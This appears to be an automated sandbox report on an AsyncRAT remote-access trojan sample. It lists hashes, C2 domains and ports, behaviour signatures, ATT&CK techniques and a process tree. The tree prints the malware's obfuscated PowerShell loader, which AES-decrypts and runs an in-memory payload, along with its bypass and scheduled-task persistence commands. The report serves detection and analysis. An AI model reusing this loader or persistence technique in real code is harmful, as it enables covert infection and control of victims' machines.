asyncrat | 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126

General

Target

8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
Size

72KB
MD5

8cb1d168cf75e754026203935dcfa023
SHA1

ba18d6636f1c59a72fa8042cff7c1e8fdf69eecb
SHA256

8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126
SHA512

7254e3bc08701fb233d1b0c340fd6104b9fc4d36ab962f7ac541f0aee539fe3c9a7b3fa692968a977e68690ad183e77d2b5f962b1265983b4771773ff55c62ae
SSDEEP

1536:/rGBmYaZyxKeBy3bCXS4ZeUSlACnztfx:/rGBmYaZyxZBy3bCHelAI9x

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

churchmon.ddns.net:6606

churchmon.ddns.net:7707

churchmon.ddns.net:8808

churchmon21.ddns.net:6606

churchmon21.ddns.net:7707

churchmon21.ddns.net:8808

churchmon22.ddns.net:6606

churchmon22.ddns.net:7707

churchmon22.ddns.net:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4644-132-0x0000000000740000-0x0000000000752000-memory.dmp	asyncrat

Executes dropped EXE 1 IoCs

Processes:

eesdbo.bat.exe

pid process

3344 eesdbo.bat.exe

pid	process
3344	eesdbo.bat.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

43 api.ipify.org
44 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3560 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3372 timeout.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeeesdbo.bat.exe

pid process

3964 powershell.exe
3964 powershell.exe
3344 eesdbo.bat.exe
3344 eesdbo.bat.exe

flow	ioc
43	api.ipify.org
44	api.ipify.org

pid	process
3560	schtasks.exe

pid	process
3372	timeout.exe

pid	process
3964	powershell.exe
3964	powershell.exe
3344	eesdbo.bat.exe
3344	eesdbo.bat.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exepowershell.exeeesdbo.bat.exe

description	pid	process
Token: SeDebugPrivilege	4644	8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	3344	eesdbo.bat.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

eesdbo.bat.exe

pid process

3344 eesdbo.bat.exe
3344 eesdbo.bat.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

eesdbo.bat.exe

pid process

3344 eesdbo.bat.exe
3344 eesdbo.bat.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

eesdbo.bat.exe

pid process

3344 eesdbo.bat.exe

pid	process
3344	eesdbo.bat.exe
3344	eesdbo.bat.exe

pid	process
3344	eesdbo.bat.exe
3344	eesdbo.bat.exe

pid	process
3344	eesdbo.bat.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.execmd.execmd.exepowershell.execmd.exeeesdbo.bat.exe

description	pid	process	target process
PID 4644 wrote to memory of 240	4644	8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe	cmd.exe
PID 4644 wrote to memory of 240	4644	8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe	cmd.exe
PID 4644 wrote to memory of 240	4644	8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe	cmd.exe
PID 4644 wrote to memory of 2256	4644	8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe	cmd.exe
PID 4644 wrote to memory of 2256	4644	8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe	cmd.exe
PID 4644 wrote to memory of 2256	4644	8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe	cmd.exe
PID 240 wrote to memory of 3964	240	cmd.exe	powershell.exe
PID 240 wrote to memory of 3964	240	cmd.exe	powershell.exe
PID 240 wrote to memory of 3964	240	cmd.exe	powershell.exe
PID 2256 wrote to memory of 3372	2256	cmd.exe	timeout.exe
PID 2256 wrote to memory of 3372	2256	cmd.exe	timeout.exe
PID 2256 wrote to memory of 3372	2256	cmd.exe	timeout.exe
PID 3964 wrote to memory of 3800	3964	powershell.exe	cmd.exe
PID 3964 wrote to memory of 3800	3964	powershell.exe	cmd.exe
PID 3964 wrote to memory of 3800	3964	powershell.exe	cmd.exe
PID 3800 wrote to memory of 3344	3800	cmd.exe	eesdbo.bat.exe
PID 3800 wrote to memory of 3344	3800	cmd.exe	eesdbo.bat.exe
PID 3800 wrote to memory of 3344	3800	cmd.exe	eesdbo.bat.exe
PID 3344 wrote to memory of 3560	3344	eesdbo.bat.exe	schtasks.exe
PID 3344 wrote to memory of 3560	3344	eesdbo.bat.exe	schtasks.exe
PID 3344 wrote to memory of 3560	3344	eesdbo.bat.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
"C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\eesdbo.bat"' & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\eesdbo.bat"'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eesdbo.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3800

C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exe
"eesdbo.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $DlAMm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\eesdbo.bat').Split([Environment]::NewLine);foreach ($gnxLA in $DlAMm) { if ($gnxLA.StartsWith(':: ')) { $EieGe = $gnxLA.Substring(3); break; }; };$CtMSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($EieGe);$CdbBY = New-Object System.Security.Cryptography.AesManaged;$CdbBY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CdbBY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CdbBY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NEPcZ0sSGxev/0ytodeTKgGxdiSyFK6PvVJKMsPopm0=');$CdbBY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x/ZAOJI37zOKAo+7A/xutg==');$bwBZg = $CdbBY.CreateDecryptor();$CtMSE = $bwBZg.TransformFinalBlock($CtMSE, 0, $CtMSE.Length);$bwBZg.Dispose();$CdbBY.Dispose();$OapWv = New-Object System.IO.MemoryStream(, $CtMSE);$Otndw = New-Object System.IO.MemoryStream;$HxJaj = New-Object System.IO.Compression.GZipStream($OapWv, [IO.Compression.CompressionMode]::Decompress);$HxJaj.CopyTo($Otndw);$HxJaj.Dispose();$OapWv.Dispose();$Otndw.Dispose();$CtMSE = $Otndw.ToArray();$HiNYF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CtMSE);$wpmOJ = $HiNYF.EntryPoint;$wpmOJ.Invoke($null, (, [string[]] ('')))
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3344

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Window" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:3560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCB44.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\SysWOW64\timeout.exe
timeout 2
3⤵
- Delays execution with timeout.exe
PID:3372

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
15KB

MD5
f5e94e7c77b98659fe7121ef0226b148

SHA1
475f8cfc212b46db59b79b2bb08315eebe3ee05e

SHA256
aaf5b408a2db7b3b7996970d30f0eecdfd0546c5de629ada6d89b4016bd1edc4

SHA512
1407306f685c0ade37404097e423a96a9ff695d051a4d3c0175fb6d92c89bc5223245c03c899e71dd8f74fb857624b569ccc95a76363b6c2c9164675cfb580c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\eesdbo.bat
Filesize
325KB

MD5
36438d908fc48e243fc04035eba3a6cd

SHA1
a552a88e74440a1137b3a3a14e4089a630dfb855

SHA256
80504bf8dd15434a9841595f3f9e405f8843dd53b292d8e30d9a15b53b51fa7a

SHA512
3cea5f310c94129fe89c1cebfada52b4d0ac1d4f4e7be4ea06872b90e969b2bec4e322a127f6c4b02a9223ad6a29b21f90c1d627f233f938ded51da3ff6fd611

Download Submit
C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCB44.tmp.bat
Filesize
216B

MD5
0b02e6984b6c86cd90d891b95b015f50

SHA1
e3d63bea04ffdbd051c051dfdd0b4824fefcea65

SHA256
ab7f66d5c61be41a157a61d4c96eb6ac223a87ab66aa3ef0479450c763911b88

SHA512
ab62cb71ee59aba5f48f03452d224408ee8932fec023277cccc9c833c6c49ac5c3798612e496b273850078af3401a6dcfe6f025a816ab1e29cdc3b846c4ac741

Download Submit
memory/240-138-0x0000000000000000-mapping.dmp

Download
memory/2256-139-0x0000000000000000-mapping.dmp

Download
memory/3344-161-0x00000000076D0000-0x0000000007720000-memory.dmp

Filesize
320KB

Download
memory/3344-159-0x0000000007580000-0x000000000758A000-memory.dmp

Filesize
40KB

Download
memory/3344-158-0x00000000073F0000-0x0000000007482000-memory.dmp

Filesize
584KB

Download
memory/3344-162-0x0000000007EF0000-0x0000000007FA2000-memory.dmp

Filesize
712KB

Download
memory/3344-156-0x0000000007870000-0x0000000007EEA000-memory.dmp

Filesize
6.5MB

Download
memory/3344-163-0x0000000008180000-0x0000000008342000-memory.dmp

Filesize
1.8MB

Download
memory/3344-153-0x0000000000000000-mapping.dmp

Download
memory/3344-164-0x0000000009070000-0x0000000009688000-memory.dmp

Filesize
6.1MB

Download
memory/3372-142-0x0000000000000000-mapping.dmp

Download
memory/3560-160-0x0000000000000000-mapping.dmp

Download
memory/3800-152-0x0000000000000000-mapping.dmp

Download
memory/3964-140-0x0000000000000000-mapping.dmp

Download
memory/3964-150-0x0000000005FA0000-0x0000000005FC2000-memory.dmp

Filesize
136KB

Download
memory/3964-149-0x0000000005F50000-0x0000000005F6A000-memory.dmp

Filesize
104KB

Download
memory/3964-148-0x0000000005FF0000-0x0000000006086000-memory.dmp

Filesize
600KB

Download
memory/3964-147-0x0000000005A60000-0x0000000005A7E000-memory.dmp

Filesize
120KB

Download
memory/3964-146-0x0000000005390000-0x00000000053F6000-memory.dmp

Filesize
408KB

Download
memory/3964-145-0x00000000052C0000-0x00000000052E2000-memory.dmp

Filesize
136KB

Download
memory/3964-144-0x0000000004B20000-0x0000000005148000-memory.dmp

Filesize
6.2MB

Download
memory/3964-143-0x00000000044B0000-0x00000000044E6000-memory.dmp

Filesize
216KB

Download
memory/4644-132-0x0000000000740000-0x0000000000752000-memory.dmp

Filesize
72KB

Download
memory/4644-137-0x00000000069E0000-0x00000000069FE000-memory.dmp

Filesize
120KB

Download
memory/4644-136-0x0000000006A40000-0x0000000006AB6000-memory.dmp

Filesize
472KB

Download
memory/4644-135-0x0000000005590000-0x00000000055F6000-memory.dmp

Filesize
408KB

Download
memory/4644-134-0x0000000005AD0000-0x0000000006074000-memory.dmp

Filesize
5.6MB

Download
memory/4644-133-0x0000000005480000-0x000000000551C000-memory.dmp

Filesize
624KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads